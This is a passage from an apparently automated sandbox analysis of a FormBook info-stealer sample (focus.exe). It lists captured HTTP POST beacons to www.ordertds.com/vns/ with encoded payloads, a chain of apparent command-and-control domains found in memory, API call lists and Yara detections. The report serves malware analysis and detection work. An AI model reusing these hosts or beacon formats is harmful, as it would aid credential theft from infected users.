Source: global traffic	HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).
Source: global traffic	HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 188725Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 48 55 57 6f 74 6b 64 78 4c 38 4d 73 73 56 4c 75 37 68 53 7a 5f 53 78 70 54 6f 45 6e 6c 4d 33 71 61 73 6e 30 6a 49 58 38 59 6b 41 68 36 6c 42 77 65 31 58 67 33 77 78 31 54 39 5f 7e 37 50 51 78 70 79 6f 78 59 65 43 44 71 33 53 7a 6f 32 76 33 64 39 53 54 53 77 45 4b 73 5a 47 77 79 52 5f 37 37 44 78 4c 30 66 73 59 34 61 34 77 38 35 46 64 38 75 6b 45 42 33 75 65 43 75 55 32 36 51 4f 68 4f 6a 78 54 46 68 5f 69 4f 4a 76 62 42 4d 34 69 59 48 73 67 68 55 76 30 73 74 77 35 2d 6f 38 76 4d 31 39 6b 37 57 63 6a 70 42 35 34 71 75 71 43 38 58 75 78 68 77 6d 75 4c 4e 69 78 2d 73 6a 38 30 54 6e 4b 77 61 53 44 31 71 66 77 73 28 57 32 2d 74 39 7a 77 33 6a 4d 75 4e 59 36 37 36 59 52 67 39 55 34 71 78 69 4e 54 47 61 4c 43 45 50 4b 67 71 30 61 51 76 4c 4b 41 56 49 77 75 6c 48 72 54 49 4d 75 61 59 49 69 4a 47 77 59 38 46 37 4f 49 38 32 72 4f 61 38 77 6a 62 4d 76 39 4f 31 33 43 36 7a 30 4d 43 41 39 48 42 42 38 36 4f 49 59 4a 48 47 6c 51 38 72 70 42 51 79 50 5f 74 6f 38 70 58 44 37 75 38 62 51 68 63 74 4f 36 45 4f 47 32 41 6c 76 7a 36 35 4a 70 71 44 67 45 67 32 54 54 61 74 57 36 71 49 35 4d 66 61 73 38 69 78 34 65 55 61 66 38 76 6f 53 47 6e 5a 72 37 56 56 4f 73 69 65 62 2d 45 48 47 47 50 30 78 41 47 35 75 46 46 7a 41 76 72 58 76 70 65 77 7a 7a 54 44 64 43 77 34 63 55 63 7a 67 31 31 6d 59 64 56 58 36 56 74 53 30 36 6d 55 37 75 75 6d 50 70 37 30 67 43 51 62 55 6e 57 47 4a 73 31 41 72 36 42 4f 70 6b 78 65 79 4b 50 68 5a 35 52 50 6d 6b 32 4d 72 6d 6b 43 76 2d 43 75 77 6e 51 35 6e 51 69 72 66 48 52 52 6f 33 64 4a 32 7a 41 4e 53 52 63 65 63 4f 5a 57 46 64 55 46 54 44 43 78 7a 6f 68 72 74 2d 39 74 46 33 72 76 7e 77 30 47 67 72 73 76 4c 44 4b 39 64 4f 4d 4f 58 78 43 34 6c 50 6b 55 48 56 33 43 49 6c 46 35 4e 49 39 68 47 34 46 51 4b 67 28 57 52 4c 72 71 31 4e 31 70 38 51 76 54 73 38 31 6c 4e 5a 4c 30 73 44 54 63 73 66 6c 55 28 70 59 4f 28 6d 78 42 70 76 46 7a 42 65 73 32 6b 52 65 5f 34 4c 4c 4a 58 51 64 62 69 6b 56 4f 48 49 34 37 55 44 47 51 55 31 32 35 49 63 28 74 77 5f 78 53 37 67 6f 46 49 66 55 6f 75 30 35 73 79 53 74 35 45 6a 48 6f 38 36 68 2d 61 42 61 50 35 77 6c 4d 77 6c 34 31 35 46 75 4d 75 32 49 6b 43 2d 59 57 41 70 52 31 31 49 35 4a 33 52 62 75 4b 64 53 45 33 50 59 41 37 36 39 74 31 61 45 4d 58 61 57 46 56 77 76 51 42 42 44 66 6e 30 55 41 28 6b 65 38 36 6b 4d 70 6f 6f 6d 38 76 67 6c 43 73 61 41 55 4f 50 5a 61 6d 70 48 45 62 79 74 49 6f 6b 68 49 42 46 73 4c 78 76 50 6d 57 5a 74 48 42 78 4e 79 53 34 68 41 49 57 7a 57 4d 70 37 53 59 7a 6f 48 6a 79 72 7a 61 37 42 50 62 77 63 2d 4a 39 76 64 4f 39 61 79 32 2d 77 35 53 6a 4d 36 69 35 61 4f 58 6d 30 54 43 77 6

Source: C:\Windows\explorer.exe

Code function: 19_2_065C0782 getaddrinfo,setsockopt,recv,

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.ordertds.com

Source: unknown

HTTP traffic detected: POST /vns/ HTTP/1.1Host: www.ordertds.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.ordertds.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ordertds.com/vns/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 42 6c 50 3d 7a 63 56 77 4b 44 4a 77 71 64 67 4d 31 39 6b 50 74 38 6c 39 6c 61 52 41 33 34 4c 37 70 42 49 36 35 48 49 6e 71 62 63 37 79 68 78 4b 37 38 67 41 77 6f 39 47 39 65 31 57 69 33 77 79 78 54 34 41 39 6f 50 49 78 74 44 67 78 5a 6d 4e 55 34 76 62 69 59 33 6e 32 39 78 69 47 43 6c 51 4b 76 74 76 7a 58 42 73 7e 37 50 78 50 45 48 55 61 59 6e 73 6d 75 4e 61 55 73 79 68 47 46 72 72 65 31 66 74 33 66 52 6a 78 62 4c 33 58 7a 52 6b 6e 4f 5a 58 52 79 74 70 6d 49 54 33 39 53 70 78 72 62 39 38 36 36 38 30 71 4e 31 79 74 6f 6d 57 6d 70 78 78 6f 4c 72 65 46 39 6e 36 78 67 70 52 6a 59 4a 7a 6d 66 77 72 7a 6c 65 43 46 69 33 55 4a 6b 71 48 30 71 53 6d 30 2d 39 43 73 6c 4b 78 47 65 6f 63 37 34 53 32 50 30 5a 46 72 37 38 6a 59 78 4f 49 4d 54 41 48 43 41 61 4c 52 42 32 64 54 68 31 51 78 63 70 6c 6b 54 4a 67 73 61 59 55 37 36 4f 49 54 66 4a 67 4a 4c 30 59 74 50 44 6c 31 33 71 42 6f 2d 36 68 71 7a 75 49 33 34 43 79 75 31 5a 70 73 59 43 48 65 65 33 4c 7a 67 38 7a 30 58 45 50 50 5f 74 6b 38 6f 57 6d 36 66 6f 62 51 31 4a 32 4d 5a 63 4b 58 6d 41 30 6f 6a 4b 37 48 36 7e 70 67 45 6f 32 4a 48 66 77 5a 70 61 49 7a 36 6a 56 73 64 69 78 34 75 55 61 54 63 75 35 54 56 7e 78 6f 59 56 63 65 2d 75 63 63 6f 70 4b 4c 44 6d 5f 6b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: BlP=zcVwKDJwqdgM19kPt8l9laRA34L7pBI65HInqbc7yhxK78gAwo9G9e1Wi3wyxT4A9oPIxtDgxZmNU4vbiY3n29xiGClQKvtvzXBs~7PxPEHUaYnsmuNaUsyhGFrre1ft3fRjxbL3XzRknOZXRytpmIT39Spxrb986680qN1ytomWmpxxoLreF9n6xgpRjYJzmfwrzleCFi3UJkqH0qSm0-9CslKxGeoc74S2P0ZFr78jYxOIMTAHCAaLRB2dTh1QxcplkTJgsaYU76OITfJgJL0YtPDl13qBo-6hqzuI34Cyu1ZpsYCHee3Lzg8z0XEPP_tk8oWm6fobQ1J2MZcKXmA0ojK7H6~pgEo2JHfwZpaIz6jVsdix4uUaTcu5TV~xoYVce-uccopKLDm_kA).

Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: changelog.txt.0.dr	String found in binary or memory: http://groups.google.com/group/lyricwiki-api/browse_thread/thread/733ccd919d654040
Source: changelog.txt.0.dr	String found in binary or memory: http://lyrics.wikia.com
Source: changelog.txt.0.dr	String found in binary or memory: http://lyrics.wikia.com.
Source: focus.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: focus.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: changelog.txt.0.dr	String found in binary or memory: http://skwire.dcmembers.com/fp/?page=trout
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoE
Source: OptimFROG.dll.0.dr	String found in binary or memory: http://www.LosslessAudio.org2
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.com/vns/www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.athleticamackay.comReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.autohotkey.com/forum/topic69642.html
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.com/vns/www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.buymysoft.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.net/vns/www.milkweedmagic.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.domennyarendi44.netReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/DcUpdaterSetup.exe
Source: changelog.txt.0.dr	String found in binary or memory: http://www.donationcoder.com/Software/Mouser/Updater/downloads/dcuhelper.zip
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.com/vns/www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.everydayresidency.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.com/vns/www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.forenvid.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.design/vns/M
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.hollandhousedesigns.designReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.space/vns/www.forenvid.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.innergardenhealing.spaceReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: changelog.txt.0.dr	String found in binary or memory: http://www.last.fm/api/submissions#subs
Source: changelog.txt.0.dr	String found in binary or memory: http://www.lyricwiki.org
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.com/vns/www.buymysoft.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.milkweedmagic.comReferer:
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpG
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpL
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehph
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMhh
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpu
Source: wscript.exe, 00000018.00000002.462977788.0000000002C08000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehpz
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.com/vns/www.athleticamackay.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ocarlosresolve.comReferer:
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com
Source: explorer.exe, 00000013.00000002.476720123.00000000065DD000.00000040.00000001.sdmp, wscript.exe, 00000018.00000002.466908835.00000000051F2000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.com/vns/www.domennyarendi44.net
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.ordertds.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: changelog.txt.0.dr	String found in binary or memory: http://www.site.com/music/song.mp3.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.com/vns/www.ocarlosresolve.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.sparkspressworld.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.com/vns/www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.thebosscollectionn.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.com/vns/www.hollandhousedesigns.design
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wiitendo.comReferer:
Source: changelog.txt.0.dr	String found in binary or memory: http://www.wikia.com/wiki/Wikia.
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.com/vns/www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.wlwmwntor.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.com/vns/www.everydayresidency.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.worklesshours.comReferer:
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.com/vns/www.innergardenhealing.space
Source: explorer.exe, 00000013.00000002.474119323.00000000056BB000.00000004.00000001.sdmp	String found in binary or memory: http://www.xn--laclnicadelvnculo-gvbi.comReferer:
Source: explorer.exe, 00000013.00000000.342900990.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000018.00000003.381851794.0000000002C21000.00000004.00000001.sdmp, wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/=CLMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp, wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0LMEM
Source: wscript.exe, 00000018.00000002.463088077.0000000002C23000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0ow1
Source: wscript.exe, 00000018.00000003.381870201.0000000002C2F000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0owM
Source: wscript.exe, 00000018.00000002.467023538.000000000558F000.00000004.00000001.sdmp	String found in binary or memory: https://www.ordertds.com/vns/?BlP=7

Source: C:\Users\user\Desktop\focus.exe

Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.357992240.0000000000011000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462752725.0000000002BA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.460384081.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358392198.0000000000900000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358594284.000000000246F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.462668066.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.358429891.0000000000A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\instructions.pdf, type: DROPPED
Source: Yara match	File source: 2.2.player-toolkit.exe.10000.0.unpack, type: UNPACKEDPE

